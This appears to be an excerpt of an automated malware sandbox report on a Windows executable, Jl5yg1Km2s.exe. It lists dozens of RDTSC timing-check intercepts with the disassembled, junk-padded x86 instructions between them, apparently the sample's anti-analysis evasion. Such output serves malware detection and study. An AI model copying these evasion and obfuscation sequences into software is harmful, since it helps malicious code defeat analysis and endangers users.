                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2790C second address: C27910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C27910 second address: C27914 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2996F second address: C29973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C29973 second address: C29985 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C29985 second address: C29989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C29989 second address: C2998F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2A90B second address: C2A90F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2A90F second address: C2A919 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C29C0D second address: C29C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2A919 second address: C2A98E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F1CC8BB7C38h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov dword ptr [ebp+122D2F4Ch], edx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F1CC8BB7C38h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 mov bx, 8922h 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F1CC8BB7C47h 0x00000056 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C29C11 second address: C29C34 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1CC8B8C9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1CC8B8C9F5h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2A98E second address: C2A994 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C29C34 second address: C29C3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2A994 second address: C2A9A1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2B87F second address: C2B8FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jne 00007F1CC8B8C9F0h 0x00000010 nop 0x00000011 cmc 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F1CC8B8C9E8h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov edi, dword ptr [ebp+122D2B37h] 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebx 0x00000039 call 00007F1CC8B8C9E8h 0x0000003e pop ebx 0x0000003f mov dword ptr [esp+04h], ebx 0x00000043 add dword ptr [esp+04h], 0000001Ah 0x0000004b inc ebx 0x0000004c push ebx 0x0000004d ret 0x0000004e pop ebx 0x0000004f ret 0x00000050 push eax 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 js 00007F1CC8B8C9E6h 0x0000005a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2C9A0 second address: C2CA2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1CC8BB7C42h 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e mov dword ptr [ebp+122D3A42h], esi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F1CC8BB7C38h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 and ebx, 6F7B1297h 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push edx 0x0000003b call 00007F1CC8BB7C38h 0x00000040 pop edx 0x00000041 mov dword ptr [esp+04h], edx 0x00000045 add dword ptr [esp+04h], 0000001Bh 0x0000004d inc edx 0x0000004e push edx 0x0000004f ret 0x00000050 pop edx 0x00000051 ret 0x00000052 jmp 00007F1CC8BB7C3Fh 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a je 00007F1CC8BB7C38h 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2CA2C second address: C2CA32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2CA32 second address: C2CA36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2D9C4 second address: C2DA2D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1CC8B8C9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov di, 44ACh 0x00000012 push 00000000h 0x00000014 jmp 00007F1CC8B8C9EAh 0x00000019 pushad 0x0000001a mov ebx, dword ptr [ebp+122D29F7h] 0x00000020 add esi, dword ptr [ebp+122D1A67h] 0x00000026 popad 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ebx 0x0000002c call 00007F1CC8B8C9E8h 0x00000031 pop ebx 0x00000032 mov dword ptr [esp+04h], ebx 0x00000036 add dword ptr [esp+04h], 0000001Ch 0x0000003e inc ebx 0x0000003f push ebx 0x00000040 ret 0x00000041 pop ebx 0x00000042 ret 0x00000043 jno 00007F1CC8B8C9ECh 0x00000049 push eax 0x0000004a jbe 00007F1CC8B8C9F4h 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2E90D second address: C2E990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jns 00007F1CC8BB7C44h 0x0000000b popad 0x0000000c push eax 0x0000000d push ebx 0x0000000e push esi 0x0000000f jmp 00007F1CC8BB7C3Eh 0x00000014 pop esi 0x00000015 pop ebx 0x00000016 nop 0x00000017 jmp 00007F1CC8BB7C40h 0x0000001c movzx ebx, di 0x0000001f push 00000000h 0x00000021 jmp 00007F1CC8BB7C3Ah 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007F1CC8BB7C38h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 00000015h 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 or dword ptr [ebp+122D20A5h], eax 0x00000048 xchg eax, esi 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c jg 00007F1CC8BB7C36h 0x00000052 jo 00007F1CC8BB7C36h 0x00000058 popad 0x00000059 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2E990 second address: C2E9A6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jc 00007F1CC8B8C9E8h 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2DB72 second address: C2DB78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2DB78 second address: C2DB7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2DB7C second address: C2DC26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F1CC8BB7C3Ch 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F1CC8BB7C38h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov edi, 085D56DBh 0x0000002e push dword ptr fs:[00000000h] 0x00000035 jns 00007F1CC8BB7C38h 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 mov edi, dword ptr [ebp+122D28DFh] 0x00000048 mov eax, dword ptr [ebp+122D0895h] 0x0000004e push 00000000h 0x00000050 push eax 0x00000051 call 00007F1CC8BB7C38h 0x00000056 pop eax 0x00000057 mov dword ptr [esp+04h], eax 0x0000005b add dword ptr [esp+04h], 00000016h 0x00000063 inc eax 0x00000064 push eax 0x00000065 ret 0x00000066 pop eax 0x00000067 ret 0x00000068 or di, C547h 0x0000006d push FFFFFFFFh 0x0000006f jg 00007F1CC8BB7C41h 0x00000075 jmp 00007F1CC8BB7C3Bh 0x0000007a push eax 0x0000007b pushad 0x0000007c jmp 00007F1CC8BB7C43h 0x00000081 push esi 0x00000082 push eax 0x00000083 push edx 0x00000084 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C30AE9 second address: C30B7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F1CC8B8C9F0h 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007F1CC8B8C9F5h 0x00000016 jne 00007F1CC8B8C9F8h 0x0000001c popad 0x0000001d nop 0x0000001e push 00000000h 0x00000020 push ebp 0x00000021 call 00007F1CC8B8C9E8h 0x00000026 pop ebp 0x00000027 mov dword ptr [esp+04h], ebp 0x0000002b add dword ptr [esp+04h], 00000015h 0x00000033 inc ebp 0x00000034 push ebp 0x00000035 ret 0x00000036 pop ebp 0x00000037 ret 0x00000038 mov ebx, dword ptr [ebp+122D18B2h] 0x0000003e push 00000000h 0x00000040 push eax 0x00000041 push edi 0x00000042 pop edi 0x00000043 pop edi 0x00000044 push 00000000h 0x00000046 add dword ptr [ebp+122D1F25h], esi 0x0000004c push eax 0x0000004d js 00007F1CC8B8C9F0h 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 popad 0x00000057 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2FB5F second address: C2FB63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2FB63 second address: C2FB69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C30D3D second address: C30D47 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1CC8BB7C3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C32AEE second address: C32B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 jng 00007F1CC8B8C9F2h 0x0000000d jns 00007F1CC8B8C9ECh 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F1CC8B8C9E8h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007F1CC8B8C9E8h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 0000001Dh 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a jg 00007F1CC8B8C9ECh 0x00000050 stc 0x00000051 sub dword ptr [ebp+122D1E8Bh], eax 0x00000057 push 00000000h 0x00000059 mov edi, dword ptr [ebp+122D3A42h] 0x0000005f xchg eax, esi 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F1CC8B8C9F3h 0x00000068 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C32B85 second address: C32BCB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1CC8BB7C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F1CC8BB7C48h 0x00000010 jmp 00007F1CC8BB7C41h 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b jmp 00007F1CC8BB7C3Bh 0x00000020 pop esi 0x00000021 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C34B76 second address: C34B7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C34B7A second address: C34BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F1CC8BB7C46h 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C34BA0 second address: C34BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F1CC8B8C9E6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C34BAA second address: C34BD1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1CC8BB7C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jo 00007F1CC8BB7C38h 0x00000012 pushad 0x00000013 popad 0x00000014 jg 00007F1CC8BB7C3Eh 0x0000001a pushad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C32DB3 second address: C32DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C34BD1 second address: C34BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C3BC03 second address: C3BC0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C469EA second address: C469EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C469EE second address: C46A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8B8C9EEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C46B79 second address: C46B92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C3Fh 0x00000009 jl 00007F1CC8BB7C36h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C4712A second address: C4714D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F9h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C4A76D second address: C4A788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8BB7C42h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1F680 second address: C1F685 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1F685 second address: C1F6E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F1CC8BB7C38h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 lea eax, dword ptr [ebp+124843F7h] 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f call 00007F1CC8BB7C38h 0x00000034 pop esi 0x00000035 mov dword ptr [esp+04h], esi 0x00000039 add dword ptr [esp+04h], 0000001Dh 0x00000041 inc esi 0x00000042 push esi 0x00000043 ret 0x00000044 pop esi 0x00000045 ret 0x00000046 nop 0x00000047 push eax 0x00000048 push edx 0x00000049 push ecx 0x0000004a js 00007F1CC8BB7C36h 0x00000050 pop ecx 0x00000051 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1F6E8 second address: C1F6F6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1F6F6 second address: C1F704 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1CC8BB7C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1FCCB second address: C1FCD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1FCD1 second address: A6EB20 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov cl, ah 0x0000000d push dword ptr [ebp+122D1585h] 0x00000013 mov edx, 23EF1354h 0x00000018 call dword ptr [ebp+122D1BDCh] 0x0000001e pushad 0x0000001f jc 00007F1CC8BB7C37h 0x00000025 clc 0x00000026 xor eax, eax 0x00000028 cmc 0x00000029 mov edx, dword ptr [esp+28h] 0x0000002d sub dword ptr [ebp+122D1E72h], edx 0x00000033 mov dword ptr [ebp+122D2B3Bh], eax 0x00000039 mov dword ptr [ebp+122D1E72h], edx 0x0000003f mov dword ptr [ebp+122D2EACh], ebx 0x00000045 mov esi, 0000003Ch 0x0000004a jmp 00007F1CC8BB7C49h 0x0000004f add esi, dword ptr [esp+24h] 0x00000053 jmp 00007F1CC8BB7C44h 0x00000058 stc 0x00000059 lodsw 0x0000005b mov dword ptr [ebp+122D2EACh], edi 0x00000061 sub dword ptr [ebp+122D1E72h], ecx 0x00000067 add eax, dword ptr [esp+24h] 0x0000006b jl 00007F1CC8BB7C37h 0x00000071 clc 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 clc 0x00000077 jp 00007F1CC8BB7C3Ch 0x0000007d mov dword ptr [ebp+122D2E13h], edx 0x00000083 nop 0x00000084 push eax 0x00000085 push edx 0x00000086 push edx 0x00000087 pushad 0x00000088 popad 0x00000089 pop edx 0x0000008a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1FD6D second address: C1FDDD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007F1CC8B8C9E6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jne 00007F1CC8B8C9EEh 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jne 00007F1CC8B8C9F2h 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 pushad 0x00000021 je 00007F1CC8B8C9E6h 0x00000027 jnp 00007F1CC8B8C9E6h 0x0000002d popad 0x0000002e jbe 00007F1CC8B8C9E8h 0x00000034 pushad 0x00000035 popad 0x00000036 popad 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b jmp 00007F1CC8B8C9F0h 0x00000040 pop eax 0x00000041 or dword ptr [ebp+122D201Ch], eax 0x00000047 push 619CFFC9h 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f push esi 0x00000050 pop esi 0x00000051 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1FDDD second address: C1FDE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1FDE1 second address: C1FDEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1FDEB second address: C1FDEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1FEB5 second address: C1FEC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C1FF67 second address: C1FF9F instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1CC8BB7C46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jg 00007F1CC8BB7C4Bh 0x00000013 jmp 00007F1CC8BB7C45h 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2021B second address: C2021F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2021F second address: C20225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C20225 second address: C2022B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2022B second address: C2022F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2022F second address: C2027D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000004h 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F1CC8B8C9E8h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 push edi 0x00000026 call 00007F1CC8B8C9F4h 0x0000002b sbb dx, 4E8Fh 0x00000030 pop edx 0x00000031 pop edx 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
